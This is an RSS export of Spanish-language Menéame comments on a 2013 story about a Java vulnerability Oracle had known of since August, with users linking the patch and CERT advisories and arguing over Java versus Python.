<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" 
     xmlns:content="http://purl.org/rss/1.0/modules/content/"
     xmlns:wfw="http://wellformedweb.org/CommentAPI/"
     xmlns:dc="http://purl.org/dc/elements/1.1/"
     xmlns:meneame="http://meneame.net/faq-es.php"
 >
<channel>
	<title>Menéame: comentarios [1810678]</title>
	<link>http://www.meneame.net</link>
	<image><title>www.meneame.net</title><link>http://www.meneame.net</link><url>http://cdn.mnmstatic.net/img/mnm/eli-rss.png</url></image>
	<description>Sitio colaborativo de publicación y comunicación entre blogs</description>
	<pubDate>Thu, 17 Jan 2013 23:45:22 +0000</pubDate>
	<generator>http://blog.meneame.net/</generator>
	<language>es</language>
	<item>
		<meneame:comment_id>12145748</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>41</meneame:order>
		<meneame:user>weliweli</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>5</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#41 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c041#c-41</link>
		<pubDate>Thu, 17 Jan 2013 23:45:22 +0000</pubDate>
		<dc:creator>weliweli</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c041#c-41</guid>
		<description><![CDATA[<p>No entiendo nada..</p><p>&#187;&nbsp;autor: <strong>weliweli</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12124657</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>40</meneame:order>
		<meneame:user>AaLiYaH</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>8</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#40 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c040#c-40</link>
		<pubDate>Mon, 14 Jan 2013 22:15:10 +0000</pubDate>
		<dc:creator>AaLiYaH</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c040#c-40</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-38" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c038#c-38" rel="nofollow">#38</a> Javera <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/wink.png" alt=";)" title=";)" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /> y por circunstancias (es de lo que curro), realmente no soy fanboy de Java, de hecho lo critico amargamente muchísimas veces, simplemente para mi gusto Java hace una POO más sencilla y las tecnologías disponibles son ilimitadas y de todos los formatos (de pago, grauitas, para linux, para windows...) y por eso creo que hay ámbitos en los que es una opción preferible a Python, por su sencillez (lo bueno de su popularidad es precisamente que existen mil frameworks para facilitarte cualquier funcionalidad que puedas requerir)<br />
<br />
Python lo que he podido ver tiene también cosas que me encantaron (no tener que definir tipos, poder devolver en un return hasta el resultado de un if o un for, los diccionarios, su estilo...) y por eso quiero mirar cosas de Django. De hecho te diré un secreto, estoy intentando aprender Python precisamente para cambiarme de lenguaje en mi curro, que os pagan mucho mejor <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /> pero eso no significa que no critique lo que no me gusta de cualquier lenguaje, sea Python o Java <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/tongue.png" alt=":-P" title=":-P" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" />.</p><p>&#187;&nbsp;autor: <strong>AaLiYaH</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12119564</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>39</meneame:order>
		<meneame:user>PussyLover</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>9</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#39 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c039#c-39</link>
		<pubDate>Mon, 14 Jan 2013 09:21:39 +0000</pubDate>
		<dc:creator>PussyLover</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c039#c-39</guid>
		<description><![CDATA[<p>Ya está publicada la actualización que corrige el bug.<br />
<br />
<a href="http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html" title="www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html" rel="nofollow">www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849</a><br />
<br />
Java 7 Update 11.</p><p>&#187;&nbsp;autor: <strong>PussyLover</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12119000</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>38</meneame:order>
		<meneame:user>oxelo</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>7</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#38 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c038#c-38</link>
		<pubDate>Mon, 14 Jan 2013 05:28:45 +0000</pubDate>
		<dc:creator>oxelo</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c038#c-38</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-36" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c036#c-36" rel="nofollow">#36</a> Bueno, cuestion de gustos supongo, a mi la instrospección de Python y su OOP en general me parece una obra maestra, y en cambio las interfaces de Java me parecen un coñazo... aunque en Python tambien puedes usar interfaces si te mola la marcha, aunque logicamente nadie se pasa a Python para usarlo como Java.<br />
<br />
Mi opinión es que Python es mejor que Java, ¿fanboys? si, los hay como en todo, pero creo que es una opinión bastante legítima. Tu eres Javero, pues ole tus webos, pero recuerda que todo esto viene del &#34;esto con Python no pasa&#34;, y es verdad, nunca se han encontrado vulnerabilidades graves en el su equivalente a la maquina virtual de Java.</p><p>&#187;&nbsp;autor: <strong>oxelo</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12118876</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>37</meneame:order>
		<meneame:user>devotee</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>29</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#37 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c037#c-37</link>
		<pubDate>Mon, 14 Jan 2013 02:12:19 +0000</pubDate>
		<dc:creator>devotee</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c037#c-37</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-19" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c019#c-19" rel="nofollow">#19</a> <a class="tooltip c:1810678-22" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c022#c-22" rel="nofollow">#22</a> El otro día mi madre me llamó porque no podía sacar los recibos de Asisa en su zona de cliente. Cuando lo miré, era justamente por esto, Firefox había desactivado el plugin de Java y en Asisa muestran los recibos con un applet.</p><p>&#187;&nbsp;autor: <strong>devotee</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12118581</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>36</meneame:order>
		<meneame:user>AaLiYaH</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>8</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#36 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c036#c-36</link>
		<pubDate>Mon, 14 Jan 2013 00:00:38 +0000</pubDate>
		<dc:creator>AaLiYaH</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c036#c-36</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-34" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c034#c-34" rel="nofollow">#34</a> y los simuladores de vuelo ADA y los bancos COBOL y que? No me vale que me digas empresas que usen Python, las conozco, pero como te he dicho cada lenguaje tiene su aplicación y para determinadas aplicaciones que puede pedirte un cliente en España la mejor opción es Java. <br />
<br />
Te pongo un ejemplo, para mi que reflection se haga a base de imports en Python me parece una chapuza metida con calzador, cuando en Java tienes clases abstractas o interfaces que hacen la POO mucho más elegante y legible. Corrígeme si me equivoco, pero lo que he visto de Python (nada en trabajo, sólo con cursos) funciona así.<br />
<br />
Si nos vamos a poner a medir la popularidad de Java vs Python creo que sale bastamente perjudicado Python, y que Java sea el lenguaje más utilizado (aunque si no me equivoco C le ha quitado el primer puesto en 2012) denota que es la mejor opción en la mayoría de desarrollos. Ojo, no digo que Java sea mejor que Python en todos los desarrollos, por eso mismo no soporto los fanboys de Python que van diciendo que Python es mejor que Java because yes.</p><p>&#187;&nbsp;autor: <strong>AaLiYaH</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12116970</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>35</meneame:order>
		<meneame:user>enlaza</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#35 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c035#c-35</link>
		<pubDate>Sun, 13 Jan 2013 18:51:00 +0000</pubDate>
		<dc:creator>enlaza</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c035#c-35</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-14" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c014#c-14" rel="nofollow">#14</a> <br />
¿Y quién sabe explicar en lenguaje sencillo las diferencias reales entre <b>Apparmor</b> y <b>SELinux</b>.?</p><p>&#187;&nbsp;autor: <strong>enlaza</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12116465</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>34</meneame:order>
		<meneame:user>oxelo</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>1</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#34 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c034#c-34</link>
		<pubDate>Sun, 13 Jan 2013 17:11:16 +0000</pubDate>
		<dc:creator>oxelo</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c034#c-34</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-31" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c031#c-31" rel="nofollow">#31</a> Respeto tu opinión, pero quiero matizar, Python no es para nada alternativo, es el 6° en popularidad por encima de C#, Perl, Ruby, ObjetiveC, etc..., por otro lado conozco bastante bien Python (no vamos a medirnos las pollas) y para encontrar algo que esté mal hecho hay que llegar muy lejos, y lo de cosas &#34;pésimas&#34; o te lo estás inventando a lo troll o no tienes ni zorra. Continuando dices que Python es malo porque el nivel empresarial en España es una mierda, pues no sabía yo que se podían calificar asi las cosas oiga, el Red Bull de Vettel debe ser una puta mierda porque no pasa los badenes de mi pueblo. Tecnologias no compatibles por su poca popularidad <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/wow.png" alt="o_o" title="o_o :wow:" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /> venga biba el fud... en fin, quieres dejar ver que los pythonistas son unos fanboys pero no sabes ni lo que dices.<br />
<br />
Python debe ser muy pésimo, solo lo usa Google, la NASA, el FBI, etc... seguro que ellos hacen las cosas &#34;con calzador&#34; <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/roll.gif" alt=":roll:" title=":roll:" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /></p><p>&#187;&nbsp;autor: <strong>oxelo</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12116365</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>33</meneame:order>
		<meneame:user>Sheldon_Cooper</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>20</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#33 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c033#c-33</link>
		<pubDate>Sun, 13 Jan 2013 16:49:04 +0000</pubDate>
		<dc:creator>Sheldon_Cooper</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c033#c-33</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-32" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c032#c-32" rel="nofollow">#32</a>: jdownloader, minecraft, el live timing oficial de la formula 1 (algo que usamos 4, eso si), libreoffice creo que aún tiene algunas dependencias de java (nada crítico por suerte, solo algún asistente). Algunas webs de periódicos creo que siguen poniendo headlines de ultima hora en un applet java (aunque hace años que no lo veo)...</p><p>&#187;&nbsp;autor: <strong>Sheldon_Cooper</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12116336</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>32</meneame:order>
		<meneame:user>comodo</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>17</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#32 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c032#c-32</link>
		<pubDate>Sun, 13 Jan 2013 16:41:52 +0000</pubDate>
		<dc:creator>comodo</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c032#c-32</guid>
		<description><![CDATA[<p>Je, je, aquí llega el tonto de turno, el que se cagó en el trombón creyendo que era un water de oro (YO). Acabo de desinstalar Java ¿para que servia? ¿En que va a cambiar mi vida sin java en mai pesional campiuter?</p><p>&#187;&nbsp;autor: <strong>comodo</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12115910</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>31</meneame:order>
		<meneame:user>AaLiYaH</meneame:user>
		<meneame:votes>4</meneame:votes>
		<meneame:karma>37</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#31 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c031#c-31</link>
		<pubDate>Sun, 13 Jan 2013 14:55:15 +0000</pubDate>
		<dc:creator>AaLiYaH</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c031#c-31</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-9" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c09#c-9" rel="nofollow">#9</a> Se algo de Python y curro con Java y los &#34;pythonistas&#34; llegáis a cansarme...os pensáis que porque usáis un lenguaje poco común ya es la polla y que quieres que os diga, Python tiene cosas muy buenas, pero otras muchas pésimas. <br />
<br />
Por ejemplo, si en España extendiéramos Python con la cantidad de programadores que no tienen ni idea (y Python se basa en que el desarrollador sabe lo que hace) tendríamos aplicaciones el doble de malas, que ya es decir (y no creas que se subiría el nivel de los programadores, aquí el software se vende al peso). Por no hablar de la cantidad de tecnologías con las que aun no es compatible dada su poca popularidad, o ciertas formas del lenguaje que a mi más que &#34;elegantes&#34; como las definís los pythonistas me parecen chapuzas metidas con calzador <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" />. <br />
<br />
Pero vamos, es normal, nada es  perfecto y toda tecnología tiene sus cosas buenas y sus cosas malas, depende en que contexto se utilice. Mira COBOL, se sigue usando en bancos y sistemas grandes por su estabilidad, pero su mantenimiento es infernal.</p><p>&#187;&nbsp;autor: <strong>AaLiYaH</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12115731</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>30</meneame:order>
		<meneame:user>--476--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>20</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#30 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c030#c-30</link>
		<pubDate>Sun, 13 Jan 2013 14:05:07 +0000</pubDate>
		<dc:creator>--476--</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c030#c-30</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-29" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c029#c-29" rel="nofollow">#29</a> Es una referencia a que Cobol era de facto el lenguaje de programación utilizado en entornos fiancieros y sobretodo bancos, hasta que ha sido más o menos reemplazando por otros lenguajes más modernos, siendo uno de los más importantes Java desde que en el 98 se publicara la plataforma J2EE (aunque no sé si se llamaba así en su primera versión, a Sun le gustaba marear con los acrónimos).<br />
<br />
Si no conoces la expresión &#34;los años X&#34;, que sepas que se refiere a la década y no al año en el que empieza... de hecho Java apareció en 1995.</p><p>&#187;&nbsp;autor: <strong>--476--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12115656</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>29</meneame:order>
		<meneame:user>oxelo</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>7</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#29 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c029#c-29</link>
		<pubDate>Sun, 13 Jan 2013 13:36:54 +0000</pubDate>
		<dc:creator>oxelo</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c029#c-29</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-27" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c027#c-27" rel="nofollow">#27</a> Solo como nota, de los 90 hace ya 23 años.</p><p>&#187;&nbsp;autor: <strong>oxelo</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12115594</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>28</meneame:order>
		<meneame:user>llou</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#28 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c028#c-28</link>
		<pubDate>Sun, 13 Jan 2013 13:16:35 +0000</pubDate>
		<dc:creator>llou</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c028#c-28</guid>
		<description><![CDATA[<p>No son tan buenos managers como se creen si no son capaces de gestionar el desarrollo de Java correctamente.</p><p>&#187;&nbsp;autor: <strong>llou</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12115549</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>27</meneame:order>
		<meneame:user>--476--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>20</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#27 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c027#c-27</link>
		<pubDate>Sun, 13 Jan 2013 13:05:17 +0000</pubDate>
		<dc:creator>--476--</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c027#c-27</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-22" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c022#c-22" rel="nofollow">#22</a> Imagino que te refieres al plugin del navegador, porque la verdad es que Java es en Cobol de los 90. No solo bancos, sino cualquier aplicación empresarial te puedes encontrar hecha en Java.<br />
<br />
Lo de los applets no es para usuarios domésticos, sino para aplicaciones internas de los bancos (aunque creo que algún banco implemente atenticación con tarjeta + pin usando un applet; pero no puedo confirmarlo, es en Windows con lo que podría ser un Active-X).</p><p>&#187;&nbsp;autor: <strong>--476--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12115422</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>26</meneame:order>
		<meneame:user>--347930--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>18</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#26 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c026#c-26</link>
		<pubDate>Sun, 13 Jan 2013 12:41:39 +0000</pubDate>
		<dc:creator>--347930--</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c026#c-26</guid>
		<description><![CDATA[<p>[Usuario deshabilitado]</p><p>&#187;&nbsp;autor: <strong>--347930--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12115326</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>25</meneame:order>
		<meneame:user>Nova6K0</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#25 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c025#c-25</link>
		<pubDate>Sun, 13 Jan 2013 12:24:27 +0000</pubDate>
		<dc:creator>Nova6K0</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c025#c-25</guid>
		<description><![CDATA[<p>Para mí son dos exploits distintos pero basados en el mismo problema:<br />
<br />
El de agosto de 2012 es este:<br />
<br />
<a href="http://www.kb.cert.org/vuls/id/636312" title="www.kb.cert.org/vuls/id/636312" rel="nofollow">www.kb.cert.org/vuls/id/636312</a><br />
<br />
Y el del 10 de enero de 2013 es este:<br />
<br />
<a href="http://www.kb.cert.org/vuls/id/625617" title="www.kb.cert.org/vuls/id/625617" rel="nofollow">www.kb.cert.org/vuls/id/625617</a><br />
<br />
Y por cierto el OpenJDK está afectado también en el primer caso.<br />
<br />
Salu2</p><p>&#187;&nbsp;autor: <strong>Nova6K0</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12115179</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>24</meneame:order>
		<meneame:user>ummon</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>30</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#24 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c024#c-24</link>
		<pubDate>Sun, 13 Jan 2013 11:59:10 +0000</pubDate>
		<dc:creator>ummon</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c024#c-24</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-22" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c022#c-22" rel="nofollow">#22</a> <a href="http://es.wikipedia.org/wiki/BankSphere" title="es.wikipedia.org/wiki/BankSphere" rel="nofollow">es.wikipedia.org/wiki/BankSphere</a></p><p>&#187;&nbsp;autor: <strong>ummon</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12115173</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>23</meneame:order>
		<meneame:user>ummon</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>16</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#23 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c023#c-23</link>
		<pubDate>Sun, 13 Jan 2013 11:57:57 +0000</pubDate>
		<dc:creator>ummon</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c023#c-23</guid>
		<description><![CDATA[<p>Java: Vulnerabilidades de OS, máquina virtual y de la propia aplicación.<br />
C/C++: Vulnerabilidades de OS y de la propia aplicación.<br />
Para mí siempre ha estado claro, pero la máquina de marketing de la antigua SUN hizo un buen trabajo, las conferencias de SUN eran magistrales con sus evangelizadores tecnológicos.</p><p>&#187;&nbsp;autor: <strong>ummon</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12115149</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>22</meneame:order>
		<meneame:user>oxelo</meneame:user>
		<meneame:votes>3</meneame:votes>
		<meneame:karma>39</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
		<title>#22 La última vulnerabilidad grave de Java era conocida por Oracle desde agosto [EN]</title>
		<link>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c022#c-22</link>
		<pubDate>Sun, 13 Jan 2013 11:53:12 +0000</pubDate>
		<dc:creator>oxelo</dc:creator>
		<guid>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c022#c-22</guid>
		<description><![CDATA[<p><a class="tooltip c:1810678-19" href="https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde/c019#c-19" rel="nofollow">#19</a> ¿Bancos haciendo cosas en Java? ROOT nos pille confesados...</p><p>&#187;&nbsp;autor: <strong>oxelo</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>12115070</meneame:comment_id>
		<meneame:link_id>1810678</meneame:link_id>
		<meneame:order>21</meneame:order>
		<meneame:user>chachechichochu</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>23</meneame:karma>
		<meneame:url>https://www.meneame.net/story/ultima-vulnerabilidad-grave-java-era-conocida-oracle-desde</meneame:url>
